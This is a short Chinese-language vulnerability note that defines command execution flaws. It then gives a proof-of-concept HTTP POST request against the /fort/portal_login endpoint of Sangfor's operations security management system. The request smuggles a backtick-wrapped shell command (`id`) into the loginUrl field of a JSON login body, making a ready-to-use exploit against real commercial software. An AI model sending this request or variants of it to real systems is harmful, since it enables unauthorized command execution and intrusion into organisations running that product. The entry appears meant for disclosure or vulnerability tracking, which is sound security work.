漏洞描述
命令执行漏洞是指攻击者通过构造特定的请求,使得服务器端执行非预期的命令,从而可能导致未授权的数据访问、权限提升、服务中断等严重后果。这种漏洞通常由于应用程序对用户输入的验证不充分或者对外部命令调用缺乏必要的安全控制而产生。
深信服运维安全管理系统 portal_login 命令执行漏洞
PoC代码
POST /fort/portal_login HTTP/1.1
Host:
Content-Type: application/json
"{\"userName\":\"Bob\", \"loginUrl\":\"`id`\", \"role\": \"\", \"password\": \"123456789\"}" #